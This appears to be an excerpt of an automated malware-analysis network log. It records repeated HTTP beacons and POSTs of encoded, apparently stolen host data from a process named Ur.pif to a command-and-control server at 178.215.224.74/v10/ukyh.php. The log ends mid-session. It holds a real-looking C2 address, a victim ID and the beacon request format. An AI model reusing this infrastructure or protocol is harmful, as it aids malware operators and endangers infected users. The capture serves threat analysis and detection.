                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 70 76 62 47 56 37 58 45 4e 79 63 45 52 6a 64 47 4e 65 54 6d 39 68 59 32 35 63 64 47 56 76 65 46 35 53 5a 58 35 6e 62 48 31 6c 52 6d 64 30 61 32 46 6e 63 79 78 74 63 47 64 5a 51 46 38 34 4b 6a 45 77 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 71 62 57 35 6c 63 31 35 42 65 48 42 47 59 33 52 68 58 6b 78 74 59 57 4e 73 58 6e 5a 6e 62 58 42 63 55 47 31 30 5a 57 35 39 5a 30 5a 74 64 6d 74 68 5a 33 45 73 5a 33 68 6e 55 30 68 66 4d [TRUNCATED]
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGpvbGV7XENycERjdGNeTm9hY25cdGVveF5SZX5nbH1lRmd0a2FncyxtcGdZQF84KjEwMypBMl5Vc2VwcVxqbW5lc15BeHBGY3RhXkxtYWNsXnZnbXBcUG10ZW59Z0ZtdmthZ3EsZ3hnU0hfMzAyKjYqW0BdMzgyKjEwMjMxKjM3OC4wMT0uMDA0LjU0WUJfMTIyKDEwMDM7KDE1U0JfOTAyKDMyMjMxKDk%2FOiwyMzUuMjI0LjU8WUBdMTIxKjEyMjAyKFJtdmdsdWVGZXRrYWVxLGd4ZVtCVTMwMCIzMjgxMygzNTosMjM9JjAwNCw3NFtAXQ%3D%3D
                                        Nov 21, 2024 20:01:20.581027031 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        33 | 192.168.2.4 | 49987 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:19.299710989 CET | 93 | OUT | GET /v10/ukyh.php?gi HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:20.629930973 CET | 211 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 11
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                        Data Ascii: 8.46.123.75


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        34 | 192.168.2.4 | 49998 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:22.481530905 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:23.786011934 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        35 | 192.168.2.4 | 49999 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:23.325367928 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:24.623718977 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        36 | 192.168.2.4 | 50005 | 178.215.224.74 | 80 | 2476 | C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:25.026915073 CET | 710 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 416
                                        Cache-Control: no-cache
                                        Data Ascii: jspo=9&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=am9uZ3tZQF1HUSJGYW9nOCIiIiAiKCgiIiAiICAgICAgIihPaWNybXFvZnYgV2lsZGd3cSIxMCJQcG1ZQF8zMi4wMTU4MjBbSF8yOTk0MTdZQl9DOFRdcWdycVxqb25lc15JcnBEYXZjXExtY2FsXlRtbXJeMTM7OTM6XlVwLHJpZltCVUE6XF1xZ3pzXmhtbGdxXEN4eEZjdGNcTG9jYWxeXGdtcFwzMTk5MzhcVXAueGlkWUBdMzAvMDRbQl9BRFtAX3xwdWVTQl9uYW5xZ1lCXzgsPD4sMzIxLjc1W0BdWUhfQzpcV3FlcnFcam9sZXtcQ3JwRGN0Y15Qb2Nva25nXEZnbnBoYWxGfW1ycQ%3D%3D
                                        Nov 21, 2024 20:01:26.379108906 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        37 | 192.168.2.4 | 50006 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:25.153795958 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:26.464991093 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        38 | 192.168.2.4 | 50007 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:26.723089933 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:28.027894020 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        39 | 192.168.2.4 | 50013 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:28.553103924 CET | 140 | OUT | GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:29.914760113 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        40 | 192.168.2.4 | 50014 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:29.002254009 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:30.314646006 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        41 | 192.168.2.4 | 50020 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:31.262891054 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:32.523741961 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:32 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        42 | 192.168.2.4 | 50031 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:35.181283951 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:36.448208094 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        43 | 192.168.2.4 | 50036 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:37.684751987 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:38.943878889 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        44 | 192.168.2.4 | 50043 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:41.044296980 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:42.287781954 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        45 | 192.168.2.4 | 50047 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:43.497288942 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:44.752422094 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:44 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        46 | 192.168.2.4 | 50048 | 178.215.224.252 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:43.513156891 CET | 98 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.252
                                        User-Agent: curl/7.83.1
                                        Accept: */*


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        47 | 192.168.2.4 | 50049 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:45.402611017 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:46.663364887 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        48 | 192.168.2.4 | 50050 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:46.892848015 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:48.167445898 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        49 | 192.168.2.4 | 50051 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:48.728887081 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:50.022901058 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:49 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        50 | 192.168.2.4 | 50052 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:50.245455027 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:51.662812948 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:51 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        51 | 192.168.2.4 | 50053 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:52.363153934 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:53.664088964 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:53 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        52 | 192.168.2.4 | 50054 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:53.867381096 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:55.249310017 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        53 | 192.168.2.4 | 50055 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:55.863719940 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:57.253498077 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        54 | 192.168.2.4 | 50056 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:57.484677076 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:58.848591089 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:58 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        55 | 192.168.2.4 | 50057 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:01:59.477477074 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:00.862489939 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:00 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        56 | 192.168.2.4 | 50058 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:01.096887112 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:02.421952963 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        57 | 192.168.2.4 | 50059 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:03.138044119 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:04.439176083 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        58 | 192.168.2.4 | 50060 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:04.717284918 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:06.170751095 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        59 | 192.168.2.4 | 50061 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:06.967983007 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:08.285877943 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        60 | 192.168.2.4 | 50062 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:09.247013092 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:10.553332090 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        61 | 192.168.2.4 | 50063 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:10.718452930 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:12.026057005 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:11 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        62 | 192.168.2.4 | 50064 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:11.975272894 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:13.378485918 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        63 | 192.168.2.4 | 50065 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:12.307480097 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:13.580341101 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        64 | 192.168.2.4 | 50066 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:13.606559038 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:14.955813885 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
